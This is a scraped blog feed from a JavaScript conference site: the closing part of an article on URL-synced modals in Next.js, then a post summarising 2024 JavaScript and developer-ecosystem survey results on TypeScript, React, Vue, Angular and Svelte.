Why it matters:

Graceful navigation plays a key role in providing a consistent and predictable user experience, even when users interact with modals in unexpected ways. By ensuring that modal behaviour aligns with navigation actions, such as using the back or forward buttons, users can move through the application naturally without encountering inconsistencies.

Catch-all routes further enhance robustness by preventing unnecessary or unintended content from being rendered in the modal slot. They act as a safeguard, ensuring that only valid routes display content, while invalid or undefined routes leave the modal slot empty. Together, these strategies create a more reliable and user-friendly application.

EVERYTHING ABOUT REACT & NEXT.JS

Explore the iJS React.js & Next.js Track

Comparison and use cases

Comparison: URL-synced modals vs. traditional client-side modals

When building modals, developers often rely on client-side state management to control their visibility. While this approach is straightforward, it has several limitations compared to URL-synced modals in Next.js:

Feature Client-side modals URL-synced modals in Next.js
Deep Linking Not supported. Users can’t share or bookmark the modal state. Fully supported. Modal states are linked to specific URLs.
Refresh Behaviour When the page is refreshed, the modal state is reset and closed. The modal state persists across refreshes.
Navigation Consistency Backwards or forward navigation cannot close or reopen the modal. Modals respect browser navigation, closing or reopening correctly.
Scalability State management for complex modals can be difficult in large applications. Simplified state management using URL routes.
SEO and Accessibility Modals are not indexed or accessible via URLs. Can be indexed and shared where appropriate.

Why URL-synchronised modals are important:

These features significantly enhance the user experience by enabling deep linking, allowing users to share and bookmark specific modal states with ease. Navigation consistency ensures that actions like using the back or forward buttons behave as expected, seamlessly opening or closing modals without disrupting the flow of the application. For developers, Next.js simplifies state management by leveraging its routing mechanisms, eliminating the need for complex custom logic to control modal behaviour. This combination of improved usability and reduced development complexity makes Next.js an ideal framework for building modern, shareable modals.

Practical use cases for URL-synced modals

Next.js makes URL-synced modals versatile and scalable. Here are a few common use cases:

Feedback forms

As this article shows, feedback forms are ideal for modals. Users can easily share a link to the form (/feedback), and the form remains accessible even after a page refresh.

Photo galleries with previews

Imagine a gallery where users can click on a thumbnail to open a photo preview in a modal. With URL-synchronised modals:

  • Clicking on a photo updates the URL (e.g. /gallery/photo/123).
  • Users can share the link, allowing others to view the photo directly.
  • Navigating backwards or forwards closes or reopens the modal.

Shopping Cart and Side Panels

E-commerce applications often use modals for shopping carts. With URL-synced modals:

  • The cart can be linked to a route such as /cart.
  • Users can share their cart link with preloaded items.
  • Refreshing the page keeps the cart open, preventing it from losing its state.

Authentication and login

For applications that require authentication, login forms can be presented as modals. A user clicking “Login” could open a modal linked to “/login.” When the modal is closed or the user navigates elsewhere, the state remains predictable.

Notifications and Wizards

  • Notifications: Display announcements or updates in a modal tied to a route, such as /announcement.
  • Onboarding Wizards: Guide users through a multistep onboarding process, with each step linked to a unique URL (e.g. /onboarding/step-1).

When to avoid URL-synced modals

Although URL-synced modals are powerful, they are not appropriate for every scenario. Consider avoiding them in the following cases:

  • Highly transient states: Modals used for brief interactions (such as confirming a delete action) may not require URL updates.
  • Sensitive data: If the modal contains sensitive information, ensure that deep linking and sharing are restricted.
  • Non-navigable workflows: If the modal does not require navigation controls (e.g. forward/backwards), simpler client-side modals may be sufficient.

With these comparisons and use cases, developers can make informed decisions about when and how to implement URL-synced modals in their Next.js projects.

iJS Newsletter

Keep up with JavaScript’s latest news!

Conclusion

URL-synchronised modals in Next.js provide a modern solution to the common challenges developers face when implementing modals in web applications. By leveraging features such as intercepting and parallel routes, Next.js enables deep linking, navigation consistency, and improved user experience – all while simplifying state management.

Key Takeaways

  1. Improved user experience:
    URL-synchronised modals allow users to share, bookmark, and revisit specific modal states without breaking functionality. They also respect browser navigation, ensuring that modals open and close as expected.
  2. Simplified state management:
    By tying modal states to the URL, developers can avoid the complexity of managing client-side state for modals in large applications.
  3. Broad applicability:
    From feedback forms and photo galleries to shopping carts and onboarding wizards, URL-synced modals provide a scalable and reusable solution for multiple use cases.

Recommendations:

  • Use Next.js’ intercepting and parallel routes to create modals that integrate seamlessly into your application.
  • Focus on accessibility by implementing ARIA roles, focus trapping, and logical navigation.
  • Evaluate whether URL-synced modals are appropriate for your specific use case, especially when dealing with transient or sensitive data.

For a complete example of building a feedback modal with URL-synced functionality in Next.js, check out my GitHub repository.

If you’re ready to take your Next.js projects to the next level, try implementing URL-synced modals today. They are not only user-friendly but also developer-friendly, making them a great addition to any modern web application.

 

The post Shareable Modals in Next.js: URL-Synced Overlays Made Easy appeared first on International JavaScript Conference.

]]>
The 2024 State of JavaScript Survey: Who’s Taking the Lead? https://javascript-conference.com/blog/state-of-javascript-ecosystem-2024/ Wed, 05 Feb 2025 10:48:23 +0000 https://javascript-conference.com/?p=107421 Dominating frontend development, JavaScript continues to be one of the most widely used programming languages and the cornerstone of web development. As we step into 2025, we’ll take a closer look at the state of JavaScript in 2024, highlighting the major trends and the most popular frameworks so you can stay ahead of the curve.

The post The 2024 State of JavaScript Survey: Who’s Taking the Lead? appeared first on International JavaScript Conference.

]]>
The State of Developer Ecosystem Report 2024 by JetBrains gives a snapshot of the developer world, based on insights from 23,262 developers worldwide. The survey shows that JavaScript remains the most-used programming language globally, with 61% of developers using it to build web pages.


Figure 1: Which programming languages have you used in the last 12 months? (source: JetBrains)

Key Takeaways

  • Demographically, the U.S. represented a large share of respondents with 15%, followed by Germany at 8%, France at 7%, and Spain and the United Kingdom at 4% each.
  • The average age of survey respondents was 33.5 years. Age and income were positively correlated, and younger respondents showed more gender diversity, suggesting changing demographics.
  • 51% of participants had 10 years or less of experience, while 33% had between 10 and 20 years of experience.
  • 95% of respondents used JavaScript in a professional capacity, and 40% used it as a hobby in 2024, up from 91% and 37% in 2023.
  • 98% reported using JavaScript for frontend development and 64% for backend. Additionally, 26% used it for mobile apps and 18% for desktop apps.

Figure 2: JavaScript use case (source: State of JS)

 

The most common application patterns remain the classic ones: Single-Page Apps (90%) and Server-Side Rendering (59%). Static Site Generation came in third position with 46%.

The survey also looked at AI usage to generate code. 20% of respondents said they never use it for coding, while 7% reported using it about half the time.

iJS Newsletter

Keep up with JavaScript’s latest news!

TypeScript vs. JavaScript

TypeScript has seen impressive growth, as its adoption has risen from 12% in 2017 to 35% in 2024, according to JetBrains’ report. 67% of respondents reported writing more TypeScript than JavaScript code, and the largest group consists of people who only write TypeScript.

Figure 3: TypeScript usage (source: State of JS)

 

TypeScript’s popularity is due to its enhanced features to write better JavaScript code. It detects errors early during development, improves code quality, and makes long-term maintenance easier, which is a huge plus for developers. However, TypeScript isn’t here to replace JavaScript. They’ll just coexist, giving developers more options based on what they need and prefer.

Libraries and Frameworks

Webpack is the most used JavaScript tool, as 85.3% of respondents reported using it. However, Vite takes the lead for the most loved, earning 56% of positive feedback. Despite being relatively new, Vite is also the third most used tool with 78.1% adoption.

React came in second for both most used (81.1%) and most loved (46.7%). 

Angular, on the other hand, ranked eighth with 50.1% usage and 23.3% positive feedback, falling behind tools like Jest, Next.js, Storybook, and Vue.js.


Figure 4: Libraries experience grouped by usage (source: State of JS)

Figure 5: Libraries experience grouped by sentiment (source: State of JS)

The survey also highlights usage trends of frontends frameworks over time. While React remains in the top spot, Vue.js continues to overtake Angular, holding on to its position as the second most used framework.

React keeps reinventing itself, transitioning from being just a library to evolving into a specification for frameworks. With the release of version 19 in December, it introduced support for web components along with new hooks and form actions that redefine how forms are handled in React. 

Vue.js’ popularity can be attributed to its flexible, comprehensive, and advanced features, which appeal to both beginners and experienced developers. Daniel Roe from the Nuxt core team credits the ecosystem’s growth to its UI libraries, with Tailwind CSS playing a key role. Its convention-based approach and cross-framework compatibility make it easier to port libraries like Radix Vue from their React counterparts. 

Angular’s third-place ranking is still a good position, as many developers and companies continue to use it for its performance, safety, and scalability. Its ecosystem, TypeScript integration, and features like dependency injection still make it an attractive choice for web development.  

Svelte’s usage is also growing steadily, with developers showing increasing favor for it after it released version 5 in October. According to Best of JS, one of its major highlights is the introduction of “runes,” a new mechanism for declaring reactive state.

Figure 6: Frontend frameworks ratios over time (source: State of JS)

iJS Newsletter

Keep up with JavaScript’s latest news!

Challenges and Limitations  

When asked about their biggest struggle with JavaScript, 32% of respondents pointed to the lack of a built-in type system, far ahead of browser support issues, which only 8% mentioned.

Regarding browser APIs, poor browser support was the biggest issue for 35% of respondents. Safari and the lack of documentation on browser features also came up as common problems with 6% and 5% mentions, respectively.

React, as the most used frontend framework, was also the most criticized, with 14% of respondents complaining about having issues with it. Common issues related to frameworks included excessive complexity, poor performance, choice overload, and breaking changes.

It’s exciting to see how the JavaScript ecosystem will develop in 2025, unlocking new possibilities for web development. The growing use of TypeScript will solidify as a standard for large-scale applications due to its type safety and improved developer tooling. We’ll also see the rise of server-side rendering (SSR) frameworks like Next.js and Nuxt.js, enhancing both performance and SEO. Additionally, React and Angular will continue to push forward with updates focused on optimizing the developer experience and simplifying app development. If you’re interested in diving deeper into these topics, make sure to check out our conference program for more insights and expert-led sessions!

If you want to get more details, check the JavaScript Survey page.

The post The 2024 State of JavaScript Survey: Who’s Taking the Lead? appeared first on International JavaScript Conference.

]]>